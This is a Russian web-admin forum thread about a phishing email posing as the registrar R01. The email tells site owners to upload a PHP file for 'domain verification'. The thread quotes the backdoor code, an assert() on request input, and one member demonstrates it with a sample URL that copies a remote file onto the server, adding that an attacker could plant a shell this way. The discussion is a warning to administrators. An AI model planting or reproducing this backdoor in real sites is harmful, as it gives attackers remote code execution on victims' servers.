VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
Получил письмо от регисратора R01 (RU-CENTER Group).
Quote:
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ******.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a15m57hj8x4gwm5g.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 26 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Вы получили это письмо, потому что подписались на получение уведомлений.
Вы можете отписаться от рассылки уведомлений в личном кабинете.
Проверил, письмо пришло от регистратора. Пошёл исполнять требование начальства. Минут десять у меня ушло на создание файла и размещение его на сайте. Спешу ответить на письмо регистратора, а то, вдруг файл не найдут, тогда кранты моему домену. Жму на кнопку почтового клиента "Ответить", в письме докладываю об окончании работ по размещению файла у себя на сайте. Отправляю письмо.
Думаете, что тут-то я и понял, что письмо пришло от злодея. Я же написал, что письмо проверял, оно пришло от регистратора, поэтому всё проходит штатно, получаю ответ на своё письмо.
Quote:
Здравствуйте!
Вас приветствует Регистратор R01.
Это письмо - автоматическое уведомление о том, что Ваша заявка получена и принята к рассмотрению.
Вашей заявке присвоен номер 2017011210038118
Обратите, пожалуйста, внимание!
1) Не отправляйте Вашу заявку повторно - это замедлит обработку уже полученной заявки.
2) Просим Вас в дальнейшей переписке по Вашему запросу сохранять номер заявки в теме письма.
3) Ответы на наиболее распространенные вопросы по услугам можно найти на нашем сайте: http://help.r01.ru/
4) В случае обращения по телефону назовите номер заявки - это ускорит ее поиск.
--
С уважением,
Департамент по работе с клиентами R01 (RU-CENTER Group)
Телефоны:
+7 495 783-3-783
8 800 775-37-83 (для регионов России)
Факс: +7 (495) 930-88-00 http://www.r01.ru=
А, вот, дальше регистратор "проснулся", там началось движение. Получил первое письмо, очевидно, общей рассылки.
Quote:
Уважаемый клиент!
Некоторые наши клиенты получили письма от имени R01 c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.
Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.
Чтобы не стать жертвой мошенничества:
обращайте внимание на адрес отправителя — наши уведомления приходят только с адресов на домене r01.ru
убедитесь, что ваши контакты не находятся в открытом доступе;
никогда не загружайте вложения и не устанавливайте внешние файлы;
в случае малейших подозрений — уточняйте информацию в службе поддержки.
Будьте бдительны!
Служба регистрации доменов Регистратора Р01 info@r01.ru
+7 (495) 783-3-783
Данное письмо является уведомлением и создано автоматически.
Пожалуйста, не отвечайте на это сообщение.
Пошёл удалять файл со своего сайта.
А дальше получил ответ на своё письмо, которое написал в ответ на письмо с требованием о размещении файла на своём сайте.
Quote:
Здравствуйте!
Полученное Вами письмо является мошенническим и отношения к R01 не имеет.
Не рекомендуем внедрять указанный код, поскольку он даст возможность злоумышленникам
провести любые манипуляции с содержимым Вашего сайта. Если код все же был размещен,
рекомендуем проверить сайт на наличие вредоносного кода и/или восстановить состояние сайта из резервной копии.
--
С уважением,
Максим Соколов
Департамент по работе с клиентами R01 (RU-CENTER Group)
Телефоны:
+7 495 783-3-783
8 800 775-37-83 (для регионов России)
Факс: +7 (495) 666-27-47 http://r01.ru
Вот так, отвечал на письмо мошенников, а моё письмо с ответом попало к регистратору. При этом, регистратор мне отвечает, что не имеет отношения к мошенникам.
Для меня всё закончилось благополучно. За время нахождения файла на сайте к нему кроме меня, никто не обращался. Но теперь ежедневно, раз в сутки, файл простукивают с IP-адреса 54.194.88.39
школохацкеры расширяются... уже не только про дыры в ДЛЕ, уже "про вообще", лишь бы файлик им создали....
смех сквозь слёзы...
Админы, не теряем бдительность и включаем мозги!!!
===
Quote:
Originally Posted by WEBCAT
Вот так, отвечал на письмо мошенников, а моё письмо с ответом попало к регистратору.
подставить мыло отправителя - минутное дело, можно от кого угодно отправить
естественно, отвечая на такое письмо, попадаем к реальному владельцу е-мейла (если мыл указан реальный, конечно)
@Canny
Знаток
Join Date: Jan 2013
Location: 127.0.0.1
Posts: 1,033
Версия vB: 6.x.x
Reputation:
Knowing 294
Репутация в разделе: 73
0
Сильно просто как то ))
@Hobot
Эксперт
Join Date: Sep 2006
Location: Единственный город Земли, расположенный с внутренней ?
Награды в конкурсах:
Posts: 3,574
Версия vB: 3.8.x
Пол:
Reputation:
Expert 2496
Репутация в разделе: 238
2
я бы уже поржал над начальными строками.
включаем мозг.
1) владелец домена - это владелец домена. он может при этом не быть владельцем сайта, на который его домен смотрит. и у него к хостингу вообще может не быть доступа. вообще не вижу связи.
я лет пять сдавал в аренду домен, исправно получая свои $$, и совершенно не имея понятия, где и как получить доступ к потрохам сайта.
2) а вот нету у меня php на хостинге. голый хтмл у меня там, индексная страница с фотографией любимой собачки/кошечки.
3) с какого это перепугу делегирование домена должно быть приостановлено? я бабок заплатил. хотите разделегировать - будьте любезны судебное решение.
4) я купил домен, сайта ещё нет, хостинга нет, будет через пару лет.
5) посмотрев на php-код, уже можно понять, что это какие-то махинации.
@Kurbatov
Эксперт
Join Date: Jan 2007
Location: %SystemRoot%
Награды в конкурсах:
Posts: 942
Версия vB: 3.8.x
Пол:
Reputation:
Professional 825
Репутация в разделе: 132
0
У меня например есть домены используемые только для почты и для сетевых нужд. Придется ставить хостинг с пхп? (
--
А на будущее, лучше подтвердить свои права на домен через регистратора в личном кабинете / офисе.
@Hobot
Эксперт
Join Date: Sep 2006
Location: Единственный город Земли, расположенный с внутренней ?
это, несомненно, первое и основное, что надо делать, причём всегда, а не только в сайтостроительстве
Однако... не наезжайте на ТС. Мне вот очень понравился сей опус. Подробно, пошагово, литературным русским
Весьма полезно для новоиспеченных админов.
А письма эти, естественно, давно не новость, хакерьё резвится... Мы не можем повправлять мозги школохацкерам, но можем попытаться предупредить честных админов. У нас на vBS, получается, последнее время раз в год всплывает что-то такое. Ну и хорошо... сейчас вот кому интересно - получили рассылку и прочитали, может, и по ссылкам из второго поста сходили. Глядишь, количество тех, кто мог наступить на такие грабли, чуток поуменьшилось. Значит, всё хорошо.
@Hobot
Эксперт
Join Date: Sep 2006
Location: Единственный город Земли, расположенный с внутренней ?
Награды в конкурсах:
Posts: 3,574
Версия vB: 3.8.x
Пол:
Reputation:
Expert 2496
Репутация в разделе: 238
0
На ТСа никто и не наезжает. Я всего лишь привёл примеры того, как должен мыслить человек, получающий такие мысли и далёкий от программизма.
Если кто-то до сих пор думает, что всё это фигня, никому эту не надо и ничего страшного этот код не сделает (а его можно просто дописать в любой легитимный файл форума), то можно просто создать у себя на локалке файл test.php, с кодом из первого поста..
и вот простой пример наступившей жопы -
обратиться к ссылке http://site.local/test.php?r01=copy("http://vbsupport.ru/forum/customavatars/avatar52138_2.gif","1.gif");
а потом обратиться к ссылке http://site.local/1.gif и увидеть мой аватар.
но злоумышленник может таким макаром запилить на сайт жертвы шелл, а там уже крутить-вертеть как угодно.
Luvilla
Гость
Posts: n/a
Quote:
Originally Posted by Hobot
Я всего лишь привёл примеры того, как должен мыслить человек, получающий такие мысли и далёкий от программизма.
такой человек, если у него голова не только для того, чтобы ею есть, взял бы этот код, прямо как есть,
<?php
assert(stripslashes($_REQUEST[R01]));
?>
и скормил бы гуглу
и получил бы сразу все ответы
а если "без хвоста", только <?php assert(stripslashes - ответов было бы ещё больше
Но для того, чтобы пойти гуглить, человек должен что-то заподозрить...
@WEBCAT
Простоузер
Join Date: Jan 2017
Posts: 379
Версия vB: 3.8.x
Reputation:
is infamous around these parts -171
Репутация в разделе: 16
0
Про мошенничество с файлами мне было известно. В тоже время, письмо с требованием о размещении файла на сайте пришло от регистратора. Последнее называется обстоятельствами. Вот, в соответствии с этим обстоятельством и другими было пригято решение о размещении файл на сайте, о чём написал в письме регистратору. Выяснилось, что регистратору файл был не нужен, после чего файл был удалён с сайта.
Взломай свой сайт своими руками
Мы не можем повправлять мозги школохацкерам, но можем попытаться предупредить честных админов. У нас на vBS, получается, последнее время раз в год всплывает что-то такое. Ну и хорошо... сейчас вот кому интересно - получили рассылку и прочитали, может, и по ссылкам из второго поста сходили. Глядишь, количество тех, кто мог наступить на такие грабли, чуток поуменьшилось. Значит, всё хорошо. 
